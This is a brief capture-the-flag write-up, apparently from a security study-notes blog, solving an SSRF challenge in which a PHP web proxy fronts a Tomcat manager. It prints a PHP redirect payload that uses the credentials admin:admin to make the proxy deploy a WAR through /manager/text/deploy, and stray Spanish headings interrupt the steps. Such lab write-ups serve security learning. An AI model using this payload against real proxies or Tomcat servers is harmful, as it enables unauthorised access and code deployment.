CTF Challenge Description:

The challenge contains a php webproxy and a Tomcat server which has the Tomcat manager app deployed andwas only accessible via the php webproxy.

https://github.com/Athlon1600/php-proxy-app is what is running in the php-proxycontainer and it has a few open issues, including some that look like they could be security-relevant.

Solución

To visit the tomcat container from the proxy, simply enter 127.0.0.1:8888 to view the tomcat webpage. Tomcat mentions an admin interface should be at /manager/html but upon visiting 127.0.0.1:8888/manager/html through the proxy we get a “401 unauthorized” error.

We also find the username and password (manager-web.xml) and that /manager/text exists as an interface for scripts.

Nosotros podemos usar /manager/text/deploy to deploy the folder that contains the flag and visit that like any other webpage.

Notas de estudio de seguridad cibernética

Notas de estudio de OSCP

Then we can host this on our local attacker machine. The server address can be:

http://127.0.0.1:8000/test

<?PHP
Header('location: http://admin:admin@127.0.0.1:8888/manager/text/deploy?path=/foofour&war=file:/c9fdb1da2a41a453ae291a1fb5d2519701bc60f6');
?>
  1. Redirect the proxy to  http://127.0.0.1:8000/test
  2. Then redirect it to http://127.0.0.1:8888/foofour/flag.txt
  3. Flag: INS{SSRF-As-A-Service}

CTF Walkthrough Playlist

,
Mostrar Comentarios

Motasem

Acerca del Autor

Creo notas de ciberseguridad, notas de marketing digital y cursos online. También brindo consultoría de marketing digital que incluye, entre otros, SEO, Google y meta anuncios y administración de CRM.

Ver Artículos